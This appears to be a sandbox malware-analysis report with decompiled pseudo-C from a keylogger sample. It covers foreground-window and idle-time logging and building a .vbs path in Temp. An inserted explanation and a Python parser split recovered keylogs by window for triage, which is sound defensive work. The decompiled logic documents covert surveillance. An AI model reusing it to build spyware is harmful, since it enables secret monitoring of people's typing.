                                    								_t238 = _t237 | E0071B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
                                    								_t239 = _t238 | E0071B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
                                    								_t240 = _t239 | E0071B0F4(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
                                    								_v20 = _v8 + 0x1c;
                                    								_t241 = _t240 | E0071B0F4(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
                                    								_t242 = _t241 | E0071B0F4(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
                                    								_t243 = _t242 | E0071B0F4(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
                                    								_t244 = _t243 | E0071B0F4(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
                                    								_t245 = _t244 | E0071B0F4(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
                                    								_t246 = _t245 | E0071B0F4(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
                                    								_t247 = _t246 | E0071B0F4(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
                                    								_t248 = _t247 | E0071B0F4(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
                                    								_t249 = _t248 | E0071B0F4(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
                                    								_t250 = _t249 | E0071B0F4(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
                                    								_t251 = _t250 | E0071B0F4(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
                                    								_t252 = _t251 | E0071B0F4(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
                                    								_t253 = _t252 | E0071B0F4(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
                                    								_t254 = _t253 | E0071B0F4(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
                                    								_t255 = _t254 | E0071B0F4(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
                                    								_t256 = _t255 | E0071B0F4(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
                                    								if((E0071B0F4(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
                                    									_t226 =  *_v20;
                                    									while( *_t226 != 0) {
                                    										_t195 =  *_t226;
                                    										if(_t195 < 0x30 || _t195 > 0x39) {
                                    											if(_t195 != 0x3b) {
                                    												goto L17;
                                    											}
                                    											_t257 = _t226;
                                    											do {
                                    												 *_t257 =  *((intOrPtr*)(_t257 + 1));
                                    												_t257 = _t257 + 1;
                                    											} while ( *_t257 != 0);
                                    										} else {
                                    											 *_t226 = _t195 - 0x30;
                                    											L17:
                                    											_t226 = _t226 + 1;
                                    										}
                                    									}
                                    									goto L25;
                                    								}
                                    								E00718782(_v8);
                                    								E007101F5(_v8);
                                    								E007101F5(_v12);
                                    								E007101F5(_v16);
                                    								goto L4;
                                    							}
                                    							E007101F5(_t234);
                                    							E007101F5(_v12);
                                    							L7:
                                    							goto L4;
                                    						}
                                    						E007101F5(_t234);
                                    						goto L7;
                                    					}
                                    					L4:
                                    					return 1;
                                    				} else {
                                    					_t231 = 0;
                                    					_v12 = 0;
                                    					_t236 = 0x73a188;
                                    					L27:
                                    					_t105 =  *(_t210 + 0x84);
                                    					if(_t105 != 0) {
                                    						asm("lock dec dword [eax]");
                                    					}
                                    					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
                                    						asm("lock xadd [ecx], eax");
                                    						if((_t105 | 0xffffffff) == 0) {
                                    							E007101F5( *(_t210 + 0x88));
                                    							E007101F5( *((intOrPtr*)(_t210 + 0x7c)));
                                    						}
                                    					}
                                    					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
                                    					 *(_t210 + 0x84) = _t231;
                                    					 *(_t210 + 0x88) = _t236;
                                    					return 0;
                                    				}
                                    			}
                                    Instruction address column 0x00718880 to 0x00718c2f (disassembly text not preserved in this extraction)

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 8b184d28bf9a30783ad1be017c58ab05367fe3e3b3352a6266470ccd7f68be4d
                                    • Instruction ID: 113754584f76763c96937a0da460ba843c2a7b0e5bd2280900d86b4b6378de38
                                    • Opcode Fuzzy Hash: 8b184d28bf9a30783ad1be017c58ab05367fe3e3b3352a6266470ccd7f68be4d
                                    • Instruction Fuzzy Hash: 46C125B1E40204EFDB60DBACCC86FDE77B8AB08700F154165FA04EB2C2D674A9859761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E0071F255(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                    				signed int _v5;
                                    				char _v6;
                                    				void* _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				intOrPtr _v36;
                                    				signed int _v44;
                                    				void _v48;
                                    				char _v72;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t114;
                                    				signed int _t123;
                                    				signed char _t124;
                                    				signed int _t134;
                                    				intOrPtr _t164;
                                    				intOrPtr _t180;
                                    				signed int* _t190;
                                    				signed int _t192;
                                    				char _t197;
                                    				signed int _t203;
                                    				signed int _t206;
                                    				signed int _t215;
                                    				signed int _t217;
                                    				signed int _t219;
                                    				signed int _t225;
                                    				signed int _t227;
                                    				signed int _t234;
                                    				signed int _t235;
                                    				signed int _t237;
                                    				signed int _t239;
                                    				signed char _t242;
                                    				intOrPtr _t245;
                                    				void* _t248;
                                    				void* _t252;
                                    				void* _t262;
                                    				signed int _t263;
                                    				signed int _t266;
                                    				signed int _t269;
                                    				signed int _t270;
                                    				void* _t272;
                                    				void* _t274;
                                    				void* _t275;
                                    				void* _t277;
                                    				void* _t278;
                                    				void* _t280;
                                    				void* _t284;
                                    
                                    				_t262 = E0071EFB8(__ecx,  &_v72, _a16, _a20, _a24);
                                    				_t192 = 6;
                                    				memcpy( &_v48, _t262, _t192 << 2);
                                    				_t274 = _t272 + 0x1c;
                                    				_t248 = _t262 + _t192 + _t192;
                                    				_t263 = _t262 | 0xffffffff;
                                    				if(_v36 != _t263) {
                                    					_t114 = E00718575(_t248, _t263, __eflags);
                                    					_t190 = _a8;
                                    					 *_t190 = _t114;
                                    					__eflags = _t114 - _t263;
                                    					if(_t114 != _t263) {
                                    						_v20 = _v20 & 0x00000000;
                                    						_v24 = 0xc;
                                    						_t275 = _t274 - 0x18;
                                    						 *_a4 = 1;
                                    						_push(6);
                                    						_v16 =  !(_a16 >> 7) & 1;
                                    						_push( &_v24);
                                    						_push(_a12);
                                    						memcpy(_t275,  &_v48, 1 << 2);
                                    						_t197 = 0;
                                    						_t252 = E0071EF23();
                                    						_t277 = _t275 + 0x2c;
                                    						_v12 = _t252;
                                    						__eflags = _t252 - 0xffffffff;
                                    						if(_t252 != 0xffffffff) {
                                    							L11:
                                    							_t123 = GetFileType(_t252);
                                    							__eflags = _t123;
                                    							if(_t123 != 0) {
                                    								__eflags = _t123 - 2;
                                    								if(_t123 != 2) {
                                    									__eflags = _t123 - 3;
                                    									_t124 = _v48;
                                    									if(_t123 == 3) {
                                    										_t124 = _t124 | 0x00000008;
                                    										__eflags = _t124;
                                    									}
                                    								} else {
                                    									_t124 = _v48 | 0x00000040;
                                    								}
                                    								_v5 = _t124;
                                    								E007184BE(_t197,  *_t190, _t252);
                                    								_t242 = _v5 | 0x00000001;
                                    								_v5 = _t242;
                                    								_v48 = _t242;
                                    								 *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                                    								_t203 =  *_t190;
                                    								_t205 = (_t203 & 0x0000003f) * 0x30;
                                    								__eflags = _a16 & 0x00000002;
                                    								 *((char*)( *((intOrPtr*)(0x73b800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                                    								if((_a16 & 0x00000002) == 0) {
                                    									L20:
                                    									_v6 = 0;
                                    									_push( &_v6);
                                    									_push(_a16);
                                    									_t278 = _t277 - 0x18;
                                    									_t206 = 6;
                                    									_push( *_t190);
                                    									memcpy(_t278,  &_v48, _t206 << 2);
                                    									_t134 = E0071ECD6(_t190,  &_v48 + _t206 + _t206,  &_v48);
                                    									_t280 = _t278 + 0x30;
                                    									__eflags = _t134;
                                    									if(__eflags == 0) {
                                    										 *((char*)( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                                    										 *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                                    										__eflags = _v5 & 0x00000048;
                                    										if((_v5 & 0x00000048) == 0) {
                                    											__eflags = _a16 & 0x00000008;
                                    											if((_a16 & 0x00000008) != 0) {
                                    												_t225 =  *_t190;
                                    												_t227 = (_t225 & 0x0000003f) * 0x30;
                                    												_t164 =  *((intOrPtr*)(0x73b800 + (_t225 >> 6) * 4));
                                    												_t87 = _t164 + _t227 + 0x28;
                                    												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                                    												__eflags =  *_t87;
                                    											}
                                    										}
                                    										_t266 = _v44;
                                    										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                                    										if((_t266 & 0xc0000000) != 0xc0000000) {
                                    											L31:
                                    											__eflags = 0;
                                    											return 0;
                                    										} else {
                                    											__eflags = _a16 & 0x00000001;
                                    											if((_a16 & 0x00000001) == 0) {
                                    												goto L31;
                                    											}
                                    											CloseHandle(_v12);
                                    											_v44 = _t266 & 0x7fffffff;
                                    											_t215 = 6;
                                    											_push( &_v24);
                                    											_push(_a12);
                                    											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                                    											_t245 = E0071EF23();
                                    											__eflags = _t245 - 0xffffffff;
                                    											if(_t245 != 0xffffffff) {
                                    												_t217 =  *_t190;
                                    												_t219 = (_t217 & 0x0000003f) * 0x30;
                                    												__eflags = _t219;
                                    												 *((intOrPtr*)( *((intOrPtr*)(0x73b800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                                    												goto L31;
                                    											}
                                    											E0070A4CE(GetLastError());
                                    											 *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                    											E00718687( *_t190);
                                    											L10:
                                    											goto L2;
                                    										}
                                    									}
                                    									_t269 = _t134;
                                    									goto L22;
                                    								} else {
                                    									_t269 = E0071F134(_t205,  *_t190);
                                    									__eflags = _t269;
                                    									if(__eflags != 0) {
                                    										L22:
                                    										E0071551E(__eflags,  *_t190);
                                    										return _t269;
                                    									}
                                    									goto L20;
                                    								}
                                    							}
                                    							_t270 = GetLastError();
                                    							E0070A4CE(_t270);
                                    							 *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                    							CloseHandle(_t252);
                                    							__eflags = _t270;
                                    							if(_t270 == 0) {
                                    								 *((intOrPtr*)(E0070A504())) = 0xd;
                                    							}
                                    							goto L2;
                                    						}
                                    						_t234 = _v44;
                                    						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                                    						if((_t234 & 0xc0000000) != 0xc0000000) {
                                    							L9:
                                    							_t235 =  *_t190;
                                    							_t237 = (_t235 & 0x0000003f) * 0x30;
                                    							_t180 =  *((intOrPtr*)(0x73b800 + (_t235 >> 6) * 4));
                                    							_t33 = _t180 + _t237 + 0x28;
                                    							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                                    							__eflags =  *_t33;
                                    							E0070A4CE(GetLastError());
                                    							goto L10;
                                    						}
                                    						__eflags = _a16 & 0x00000001;
                                    						if((_a16 & 0x00000001) == 0) {
                                    							goto L9;
                                    						}
                                    						_t284 = _t277 - 0x18;
                                    						_v44 = _t234 & 0x7fffffff;
                                    						_t239 = 6;
                                    						_push( &_v24);
                                    						_push(_a12);
                                    						memcpy(_t284,  &_v48, _t239 << 2);
                                    						_t197 = 0;
                                    						_t252 = E0071EF23();
                                    						_t277 = _t284 + 0x2c;
                                    						_v12 = _t252;
                                    						__eflags = _t252 - 0xffffffff;
                                    						if(_t252 != 0xffffffff) {
                                    							goto L11;
                                    						}
                                    						goto L9;
                                    					} else {
                                    						 *(E0070A4F1()) =  *_t186 & 0x00000000;
                                    						 *_t190 = _t263;
                                    						 *((intOrPtr*)(E0070A504())) = 0x18;
                                    						goto L2;
                                    					}
                                    				} else {
                                    					 *(E0070A4F1()) =  *_t188 & 0x00000000;
                                    					 *_a8 = _t263;
                                    					L2:
                                    					return  *((intOrPtr*)(E0070A504()));
                                    				}
                                    			}
                                    0x0071f278
                                    0x0071f27c
                                    0x0071f27d
                                    0x0071f27d
                                    0x0071f27d
                                    0x0071f27f
                                    0x0071f285
                                    0x0071f2a0
                                    0x0071f2a5
                                    0x0071f2a8
                                    0x0071f2aa
                                    0x0071f2ac
                                    0x0071f2cb
                                    0x0071f2d2
                                    0x0071f2d9
                                    0x0071f2dc
                                    0x0071f2e8
                                    0x0071f2eb
                                    0x0071f2f3
                                    0x0071f2f4
                                    0x0071f2f7
                                    0x0071f2f7
                                    0x0071f2fe
                                    0x0071f300
                                    0x0071f303
                                    0x0071f30b
                                    0x0071f30e
                                    0x0071f37b
                                    0x0071f37c
                                    0x0071f382
                                    0x0071f384
                                    0x0071f3cd
                                    0x0071f3d0
                                    0x0071f3d9
                                    0x0071f3dc
                                    0x0071f3df
                                    0x0071f3e1
                                    0x0071f3e1
                                    0x0071f3e1
                                    0x0071f3d2
                                    0x0071f3d5
                                    0x0071f3d5
                                    0x0071f3e6
                                    0x0071f3e9
                                    0x0071f3f5
                                    0x0071f3fa
                                    0x0071f406
                                    0x0071f410
                                    0x0071f414
                                    0x0071f41e
                                    0x0071f421
                                    0x0071f42c
                                    0x0071f431
                                    0x0071f441
                                    0x0071f444
                                    0x0071f448
                                    0x0071f449
                                    0x0071f44f
                                    0x0071f454
                                    0x0071f457
                                    0x0071f459
                                    0x0071f45b
                                    0x0071f460
                                    0x0071f463
                                    0x0071f465
                                    0x0071f48f
                                    0x0071f4b3
                                    0x0071f4b7
                                    0x0071f4bb
                                    0x0071f4bd
                                    0x0071f4c1
                                    0x0071f4c3
                                    0x0071f4cd
                                    0x0071f4d0
                                    0x0071f4d7
                                    0x0071f4d7
                                    0x0071f4d7
                                    0x0071f4d7
                                    0x0071f4c1
                                    0x0071f4dc
                                    0x0071f4e8
                                    0x0071f4ea
                                    0x0071f575
                                    0x0071f575
                                    0x00000000
                                    0x0071f4f0
                                    0x0071f4f0
                                    0x0071f4f4
                                    0x00000000
                                    0x00000000
                                    0x0071f4f9
                                    0x0071f50b
                                    0x0071f513
                                    0x0071f516
                                    0x0071f517
                                    0x0071f51a
                                    0x0071f521
                                    0x0071f526
                                    0x0071f529
                                    0x0071f55d
                                    0x0071f567
                                    0x0071f567
                                    0x0071f571
                                    0x00000000
                                    0x0071f571
                                    0x0071f532
                                    0x0071f54b
                                    0x0071f552
                                    0x0071f375
                                    0x00000000
                                    0x0071f375
                                    0x0071f4ea
                                    0x0071f467
                                    0x00000000
                                    0x0071f433
                                    0x0071f43a
                                    0x0071f43d
                                    0x0071f43f
                                    0x0071f469
                                    0x0071f46b
                                    0x00000000
                                    0x0071f471
                                    0x00000000
                                    0x0071f43f
                                    0x0071f431
                                    0x0071f38c
                                    0x0071f38f
                                    0x0071f3aa
                                    0x0071f3af
                                    0x0071f3b5
                                    0x0071f3b7
                                    0x0071f3c2
                                    0x0071f3c2
                                    0x00000000
                                    0x0071f3b7
                                    0x0071f310
                                    0x0071f317
                                    0x0071f319
                                    0x0071f350
                                    0x0071f350
                                    0x0071f35a
                                    0x0071f35d
                                    0x0071f364
                                    0x0071f364
                                    0x0071f364
                                    0x0071f370
                                    0x00000000
                                    0x0071f370
                                    0x0071f31b
                                    0x0071f31f
                                    0x00000000
                                    0x00000000
                                    0x0071f321
                                    0x0071f330
                                    0x0071f335
                                    0x0071f338
                                    0x0071f339
                                    0x0071f33c
                                    0x0071f33c
                                    0x0071f343
                                    0x0071f345
                                    0x0071f348
                                    0x0071f34b
                                    0x0071f34e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0071f2ae
                                    0x0071f2b3
                                    0x0071f2b6
                                    0x0071f2bd
                                    0x00000000
                                    0x0071f2bd
                                    0x0071f287
                                    0x0071f28c
                                    0x0071f292
                                    0x0071f294
                                    0x00000000
                                    0x0071f299

                                    APIs
                                      • Part of subcall function 0071EF23: CreateFileW.KERNEL32(00000000,00000000,?,0071F2FE,?,?,00000000,?,0071F2FE,00000000,0000000C), ref: 0071EF40
                                    • GetLastError.KERNEL32 ref: 0071F369
                                    • __dosmaperr.LIBCMT ref: 0071F370
                                    • GetFileType.KERNEL32(00000000), ref: 0071F37C
                                    • GetLastError.KERNEL32 ref: 0071F386
                                    • __dosmaperr.LIBCMT ref: 0071F38F
                                    • CloseHandle.KERNEL32(00000000), ref: 0071F3AF
                                    • CloseHandle.KERNEL32(?), ref: 0071F4F9
                                    • GetLastError.KERNEL32 ref: 0071F52B
                                    • __dosmaperr.LIBCMT ref: 0071F532
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: 3015742b08412d800a8334900f9c799552bba58c4b90791f7f0aaf0f648f057f
                                    • Instruction ID: f74ff90b3d3b561967fccfd5e2ae37b9758f60560666e69bc413fc969b1effd3
                                    • Opcode Fuzzy Hash: 3015742b08412d800a8334900f9c799552bba58c4b90791f7f0aaf0f648f057f
                                    • Instruction Fuzzy Hash: 5CA14332A101499FDF189F6CD8867EE7BE1AB06320F144269F811DB2D1DB3C8952CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E006D9195(void* __ecx, void* __edx) {
                                    				char _v28;
                                    				char _v56;
                                    				char _v76;
                                    				char _v80;
                                    				char _v100;
                                    				void* _v104;
                                    				char _v108;
                                    				char _v112;
                                    				struct HWND__* _v116;
                                    				void* __ebx;
                                    				void* __edi;
                                    				int _t36;
                                    				struct HWND__* _t42;
                                    				void* _t50;
                                    				int _t57;
                                    				struct HWND__* _t77;
                                    				void* _t119;
                                    				signed int _t125;
                                    				void* _t127;
                                    
                                    				_t112 = __edx;
                                    				_t127 = (_t125 & 0xfffffff8) - 0x74;
                                    				_push(_t77);
                                    				_push(0xea60);
                                    				_t119 = __ecx;
                                    				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                                    					Sleep(0x1f4);
                                    					_t77 = GetForegroundWindow();
                                    					_t36 = GetWindowTextLengthW(_t77);
                                    					_t4 = _t36 + 1; // 0x1
                                    					E006D9DEC(_t77,  &_v100, _t112, _t119, _t4, 0);
                                    					if(_t36 != 0) {
                                    						_t57 = E006D2489();
                                    						GetWindowTextW(_t77, E006D1EEB( &_v100), _t57);
                                    						_t112 = 0x73dd0c;
                                    						if(E006D9EAC(0x73dd0c) == 0) {
                                    							E006D9DD2(0x73dd0c,  &_v100);
                                    							E006D733F(E006D2489() - 1);
                                    							_t127 = _t127 - 0x18;
                                    							_t136 =  *0x73c39b;
                                    							if( *0x73c39b == 0) {
                                    								_t112 = E006D9E69( &_v76, L"\r\n[ ", __eflags,  &_v108);
                                    								E006D30A6(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
                                    								E006D8B80(_t119);
                                    								E006D1EF0();
                                    							} else {
                                    								E006D7350(_t77, _t127, 0x73dd0c, _t136,  &_v108);
                                    								E006D9634(_t77, _t119, _t136);
                                    							}
                                    						}
                                    					}
                                    					_t83 = _t119;
                                    					E006D9C15(_t119);
                                    					if(E006E71D6(_t119) < 0xea60) {
                                    						L18:
                                    						E006D1EF0();
                                    						continue;
                                    					} else {
                                    						_t77 = _v116;
                                    						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                                    							_t42 = E006E71D6(_t83);
                                    							if(_t42 < 0xea60) {
                                    								__eflags = _t77 % 0xea60;
                                    								E0070BACE(_t83, _t77 / 0xea60,  &_v112, 0xa);
                                    								_t50 = E006D5343(_t77,  &_v80, E006D75C2(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E006D2084(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
                                    								_t127 = _t127 + 0xc - 0x14;
                                    								_t112 = _t50;
                                    								E006E72DA(_t127, _t50);
                                    								E006D8B80(_t119);
                                    								E006D1FC7();
                                    								E006D1FC7();
                                    								E006D1FC7();
                                    								goto L18;
                                    							}
                                    							_t77 = _t42;
                                    							_v116 = _t77;
                                    							Sleep(0x3e8);
                                    						}
                                    						E006D1EF0();
                                    						break;
                                    					}
                                    				}
                                    				__eflags = 0;
                                    				return 0;
                                    			}

                                    0x006d9195
                                    0x006d919b
                                    0x006d919e
                                    0x006d919f
                                    0x006d91a1
                                    0x006d91a3
                                    0x006d9202
                                    0x006d920e
                                    0x006d9211
                                    0x006d921b
                                    0x006d9223
                                    0x006d922a
                                    0x006d9234
                                    0x006d9245
                                    0x006d924b
                                    0x006d925b
                                    0x006d9267
                                    0x006d927b
                                    0x006d9280
                                    0x006d9287
                                    0x006d928e
                                    0x006d92b8
                                    0x006d92bc
                                    0x006d92c4
                                    0x006d92cd
                                    0x006d9290
                                    0x006d9293
                                    0x006d929a
                                    0x006d929a
                                    0x006d928e
                                    0x006d925b
                                    0x006d92d2
                                    0x006d92d4
                                    0x006d92e5
                                    0x006d938d
                                    0x006d9391
                                    0x00000000
                                    0x006d92eb
                                    0x006d92eb
                                    0x006d92ef
                                    0x006d92ff
                                    0x006d9306
                                    0x006d9326
                                    0x006d9329
                                    0x006d935a
                                    0x006d935f
                                    0x006d9362
                                    0x006d9366
                                    0x006d936d
                                    0x006d9376
                                    0x006d937f
                                    0x006d9388
                                    0x00000000
                                    0x006d9388
                                    0x006d9308
                                    0x006d930f
                                    0x006d9313
                                    0x006d9313
                                    0x006d939f
                                    0x00000000
                                    0x006d939f
                                    0x006d92e5
                                    0x006d93a6
                                    0x006d93ac

                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 006D91F7
                                    • Sleep.KERNEL32(000001F4), ref: 006D9202
                                    • GetForegroundWindow.USER32 ref: 006D9208
                                    • GetWindowTextLengthW.USER32(00000000), ref: 006D9211
                                    • GetWindowTextW.USER32 ref: 006D9245
                                    • Sleep.KERNEL32(000003E8), ref: 006D9313
                                      • Part of subcall function 006D9E69: char_traits.LIBCPMT ref: 006D9E79
                                      • Part of subcall function 006D8B80: SetEvent.KERNEL32(?,?,?,?,006D9CFC,?,?,?,?,?,00000000), ref: 006D8BAD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                                    • String ID: [ ${ User has been idle for $ ]$ minutes }
                                    • API String ID: 107669343-3343415809
                                    • Opcode ID: 58ad1c743f3e84d86d6eea8774a5326908f5ca56e05dfaffd722b0f49ebba19a
                                    • Instruction ID: 2e4ad7ce683096df61071847f42b1aa47c51f4ddabf2a070513f2d07c5f3b9e1
                                    • Opcode Fuzzy Hash: 58ad1c743f3e84d86d6eea8774a5326908f5ca56e05dfaffd722b0f49ebba19a
                                    • Instruction Fuzzy Hash: D151F771A183416BD354F734D896AAE77A7AF84310F00052FF886863D2DF689E45C6AA
                                    Uniqueness

                                    Uniqueness Score: -1.00%
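The routine above is the keylogger's window-title and idle tracker. Every 500 ms (Sleep(0x1F4)) it reads the foreground window title with GetForegroundWindow/GetWindowTextLengthW/GetWindowTextW and, on the `*0x73c39b == 0` branch, writes it into the log framed as "\r\n[ <title> ]\r\n" (the other branch goes through E006D7350/E006D9634, presumably an alternate log format; that is an assumption). It then calls E006E71D6, which from its use here looks like a milliseconds-since-last-input helper: once the value reaches 0xEA60 (60 000 ms) the loop sleeps 1 s per iteration (Sleep(0x3E8)) until the reading drops again, and then logs "\r\n{ User has been idle for N minutes }\r\n" with N = last idle reading / 0xEA60. The following parser, added here as an example and not part of the report or the sample, splits a recovered log that uses this framing into window, idle and keystroke events so the typed text can be attributed to the window that had focus. The log text is constructed for the example.

```python
import re

# Constants taken from the decompiled routine above.
IDLE_THRESHOLD_MS = 0xEA60   # 60 000 ms: idle is reported only after a full minute without input
IDLE_POLL_MS = 0x3E8         # Sleep(1000) while waiting for the user to come back
TITLE_POLL_MS = 0x1F4        # Sleep(500) between foreground-window checks

# The two framings the routine writes into the log: titles wrapped in
# "\r\n[ ... ]\r\n", idle notices in "\r\n{ User has been idle for N minutes }\r\n".
_MARK = re.compile(
    r"\r\n\[ (?P<title>[^\r\n]*?) \]\r\n"
    r"|\r\n\{ User has been idle for (?P<idle>\d+) minutes \}\r\n"
)


def idle_minutes(last_idle_ms: int) -> int:
    """Same arithmetic as the routine: whole minutes of the last idle reading."""
    return last_idle_ms // IDLE_THRESHOLD_MS


def parse_keylog(text: str):
    """Split a captured log into ("window", title), ("idle", minutes) and ("keys", text) events."""
    events = []
    pos = 0
    for m in _MARK.finditer(text):
        typed = text[pos:m.start()]
        if typed:
            events.append(("keys", typed))
        if m.group("title") is not None:
            events.append(("window", m.group("title")))
        else:
            events.append(("idle", int(m.group("idle"))))
        pos = m.end()
    if text[pos:]:
        events.append(("keys", text[pos:]))
    return events


def keys_per_window(events):
    """Attribute typed text to the window that had focus, for a quick triage view."""
    summary = {}
    current = None
    for kind, value in events:
        if kind == "window":
            current = value
            summary.setdefault(current, "")
        elif kind == "keys":
            summary[current] = summary.get(current, "") + value
    return summary


# Constructed sample shaped like the routine's output (not a capture from this sample's run).
SAMPLE_LOG = (
    "\r\n[ Untitled - Notepad ]\r\n"
    "meeting notes"
    "\r\n[ Inbox - Mail ]\r\n"
    "\r\n{ User has been idle for 3 minutes }\r\n"
    "reply sent"
)

if __name__ == "__main__":
    for event in parse_keylog(SAMPLE_LOG):
        print(event)
    print(keys_per_window(parse_keylog(SAMPLE_LOG)))
```

Because the title framing is matched only with its CRLF delimiters, a stray "[" typed by the user is not mistaken for a window marker; a title that itself contains " ]\r\n" would still confuse the split, which is the one ambiguity the format leaves.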

                                    C-Code - Quality: 100%
                                    			E006DB488(void* __ebx, void* __eflags) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v100;
                                    				char _v124;
                                    				char _v148;
                                    				char _v172;
                                    				char _v196;
                                    				short _v716;
                                    				void* __edi;
                                    				void* __ebp;
                                    				void* _t36;
                                    				void* _t37;
                                    				void* _t40;
                                    				void* _t54;
                                    				void* _t67;
                                    				void* _t68;
                                    				void* _t79;
                                    
                                    				_t79 = __ebx;
                                    				E006E015B();
                                    				_t36 = E006D2489();
                                    				_t37 = E006D1F95(0x73c560);
                                    				_t40 = E006E0A30(E006D1F95(0x73c518), "exepath",  &_v716, 0x208, _t37, _t36);
                                    				_t140 = _t40;
                                    				if(_t40 == 0) {
                                    					GetModuleFileNameW(0,  &_v716, 0x208);
                                    				}
                                    				E006D30A6(_t79,  &_v124, E006E72DA( &_v52, E006E7093( &_v76)), 0, _t140, L".vbs");
                                    				E006D1EF0();
                                    				E006D1FC7();
                                    				E006D4429(_t79,  &_v100, E006D30A6(_t79,  &_v76, E006D427F(_t79,  &_v52, E0070987F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
                                    				E006D1EF0();
                                    				E006D1EF0();
